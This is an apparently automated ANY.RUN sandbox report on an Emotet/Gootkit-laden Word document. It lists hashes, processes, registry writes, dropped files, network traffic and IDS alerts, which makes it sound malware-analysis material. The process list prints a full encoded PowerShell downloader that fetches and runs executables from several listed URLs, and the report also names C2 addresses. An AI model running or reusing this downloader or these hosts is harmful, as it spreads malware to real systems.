analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Inf 373539 64373496.doc

Full analysis: https://app.any.run/tasks/a9a21ef3-969b-47b4-8eb3-02a828804e93
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2019, 08:24:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
gootkit
loader
emotet
evasion
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: programming protocol Fundamental, Subject: Arkansas, Author: Hallie Nader, Comments: payment Streamlined Home Loan Account, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 15 07:58:00 2019, Last Saved Time/Date: Wed May 15 07:58:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0
MD5:

B2D92545F8084B01789CF96632BDBADC

SHA1:

7C0DCA98E11E9080C24AC761B9C25E41AEE91FD5

SHA256:

10637E759D7D2314BB65EB9E64C57B756B9400CC8D291F317F5C5267FEB0AAA4

SSDEEP:

3072:2J77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qtDo01t+futlF196oNa:2J77HUUUUUUUUUUUUUUUUUUUT52VbktU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GOTKIT detected

      • powershell.exe (PID: 872)
      • 267.exe (PID: 3920)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 872)
    • Application was dropped or rewritten from another process

      • 267.exe (PID: 3920)
      • 267.exe (PID: 2328)
      • soundser.exe (PID: 536)
      • soundser.exe (PID: 3548)
    • Emotet process was detected

      • soundser.exe (PID: 536)
    • EMOTET was detected

      • soundser.exe (PID: 3548)
    • Connects to CnC server

      • soundser.exe (PID: 3548)
    • Changes the autorun value in the registry

      • soundser.exe (PID: 3548)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 872)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 872)
      • 267.exe (PID: 3920)
    • Application launched itself

      • 267.exe (PID: 2328)
      • soundser.exe (PID: 536)
    • Starts itself from another location

      • 267.exe (PID: 3920)
    • Connects to server without host name

      • soundser.exe (PID: 3548)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2124)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2124)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Effertz
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 202
Paragraphs: 1
Lines: 1
Company: Quigley, Rice and Blick
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 173
Words: 30
Pages: 1
ModifyDate: 2019:05:15 06:58:00
CreateDate: 2019:05:15 06:58:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: payment Streamlined Home Loan Account
Keywords: -
Author: Hallie Nader
Subject: Arkansas
Title: programming protocol Fundamental
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs #GOOTKIT powershell.exe 267.exe no specs #GOOTKIT 267.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
2124"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Inf 373539 64373496.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
872powershell -enc JABiADYANgAzADAAMQA9ACcARABfADMANQA3ADEAOQA2ACcAOwAkAFYAOQA2ADAAMgAzADUANQAgAD0AIAAnADIANgA3ACcAOwAkAGwANQAzADcAMwBfAD0AJwBjADkAMwA2ADQAMwA4ADMAJwA7ACQAVAA1ADcANgA5ADkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFYAOQA2ADAAMgAzADUANQArACcALgBlAHgAZQAnADsAJABIADcANwA3AF8AOAAwAD0AJwBIADYAMQA4AF8AOQAxADEAJwA7ACQAcQBfADYANwA5ADUAOAA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBgAGUAVAAuAGAAVwBFAEIAYwBsAGkAZQBuAHQAOwAkAHYAMwAyAF8ANAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBlAGwAZQBtAGUAbQBvAHIAeQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AOQB5ADgAMAAwADIANAAvAEAAaAB0AHQAcAA6AC8ALwBhAGsAdABwAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHoAdgAxAHgAOQAwAC8AQABoAHQAdABwADoALwAvAHIAaQBzAGkAbgBnAGkAbgBkAGkAYQBuAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBsADIALwBAAGgAdAB0AHAAOgAvAC8AZgBpAGYAaQBkAG8AcwBzAGEAbAB0AG8AcwBhAGwAdABvAHMALgBjAG8AbQAvAHkAZgBwAG8ALwB1AGYAagBlAGkAeAAwADcALwBAAGgAdAB0AHAAOgAvAC8AdwBlAGEAcgB0AGUAeABoAGkAYgBpAHQAaQBvAG4AcwAuAGMAbwBtAC8AZQBxAHAAbABzAGoALwBiADEAdgAzAHoAMQAwAC8AJwAuAFMAUABMAEkAVAAoACcAQAAnACkAOwAkAHYANAA0AF8AMgA1AD0AJwBZAF8AMwBfADkANwAwADIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHoANgAwADgAMQBfADkAIABpAG4AIAAkAHYAMwAyAF8ANAAyADQAOAApAHsAdAByAHkAewAkAHEAXwA2ADcAOQA1ADgALgBEAG8AVwBOAEwATwBhAEQAZgBpAEwAZQAoACQAegA2ADAAOAAxAF8AOQAsACAAJABUADUANwA2ADkAOQApADsAJABJADUANwA5ADcAXwA5ADYAPQAnAFAAOAAzADIAOQBfACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAVAA1ADcANgA5ADkAKQAuAGwARQBuAEcAdABIACAALQBnAGUAIAAyADQANQAxADkAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUALQAnACsAJwBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAVAA1ADcANgA5ADkAOwAkAGgANgAyADAAMAA0ADgAOAA9ACcAWQA5ADAAOAA0AF8ANgA5ACcAOwBiAHIAZQBhAGsAOwAkAFAAMgA3AF8AXwA2ADkAOQA9ACcAcwA1ADYAMwA1ADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAbAA1ADAANAA3ADkAMQA9ACcAegAwADMANAAzADEANwAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2328"C:\Users\admin\267.exe" C:\Users\admin\267.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\users\admin\267.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
3920--b640ad31C:\Users\admin\267.exe
267.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\users\admin\267.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
536"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
267.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Exit code:
0
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\users\admin\appdata\local\soundser\soundser.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
3548--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile ikstaller
Version:
7.02.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\users\admin\appdata\local\soundser\soundser.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events
1 712
Read events
1 229
Write events
478
Delete events
5

Modification events

(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:9|7
Value:
397C37004C080000010000000000000000000000
(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2124) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1320091678
(PID) Process:(2124) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1320091792
(PID) Process:(2124) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1320091793
(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
4C0800006CDD79A4F70AD50100000000
(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:r}7
Value:
727D37004C08000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:r}7
Value:
727D37004C08000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2124) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2124WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4019.tmp.cvr
MD5:
SHA256:
872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4UE38M408E4RPR7MC7T.temp
MD5:
SHA256:
2124WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:F175E92B63B24B8C41DF3CF129666CD9
SHA256:FA116268699807AA8F0B36B8599B0414660B16C8ACA2119196CF85D420B75B0B
2124WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41A10336.wmfwmf
MD5:F9F6D3D78EBA071386AAB4E37819B441
SHA256:20D65CE69D712004B573880B64430AF46E5F0A16C8C503E867DC65ADC8D8B048
2124WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE5BECB4.wmfwmf
MD5:311831E7CACCC1B5FF7C7BDA00056634
SHA256:8E41E443D9BCEE0352078DD6658355E04F0C6AA59123A0AF4DC98CD49C445CB1
872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134a7a.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2124WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCBAADBF.wmfwmf
MD5:A108E8E415566FC69E63C64D3826DF06
SHA256:C139DE7DE9CE279B152FF1F8949CD79902F403B092DC9B11F9EEA976FAF6B685
2124WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:78854943818252C6E83A83506E030BA5
SHA256:70605DF163FEFE0262A4C8EC5FEA5164CDA9B34A06150B7FAA60DE41EEFE53B8
872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2124WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$f 373539 64373496.docpgc
MD5:2B419A1E0EB458DA2D8A6A7E686446EC
SHA256:3642663E8355BE118AD0CFAE7006DAB3ECE2257AEC924A7762A5C1E84837F258
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
8
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
872
powershell.exe
GET
200
173.236.56.186:80
http://elememory.com/wp-admin/9y80024/
US
executable
118 Kb
suspicious
3548
soundser.exe
GET
61.92.159.208:8080
http://61.92.159.208:8080/whoami.php
HK
malicious
3548
soundser.exe
POST
187.242.204.142:80
http://187.242.204.142/balloon/entries/ringin/
MX
malicious
3548
soundser.exe
POST
186.121.223.131:80
http://186.121.223.131/between/
BO
malicious
3548
soundser.exe
POST
191.97.116.232:443
http://191.97.116.232:443/tpt/free/ringin/merge/
AR
malicious
3548
soundser.exe
POST
200
64.87.26.16:443
http://64.87.26.16:443/cone/health/ringin/
US
binary
705 Kb
malicious
3548
soundser.exe
POST
200
64.87.26.16:443
http://64.87.26.16:443/chunk/teapot/
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3548
soundser.exe
191.97.116.232:443
FEROGLIO JULIA ELENA
AR
malicious
3548
soundser.exe
186.121.223.131:80
AXS Bolivia S. A.
BO
malicious
3548
soundser.exe
217.92.171.167:53
Deutsche Telekom AG
DE
malicious
3548
soundser.exe
187.242.204.142:80
Mega Cable, S.A. de C.V.
MX
malicious
872
powershell.exe
173.236.56.186:80
elememory.com
SingleHop, Inc.
US
suspicious
3548
soundser.exe
64.87.26.16:443
American Internet Services, LLC.
US
malicious
3548
soundser.exe
61.92.159.208:8080
Hong Kong Broadband Network Ltd.
HK
malicious

DNS requests

Domain
IP
Reputation
elememory.com
  • 173.236.56.186
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
872
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
872
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
872
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3548
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3548
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3548
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3548
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3548
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3548
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3548
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
10 ETPRO signatures available at the full report
No debug info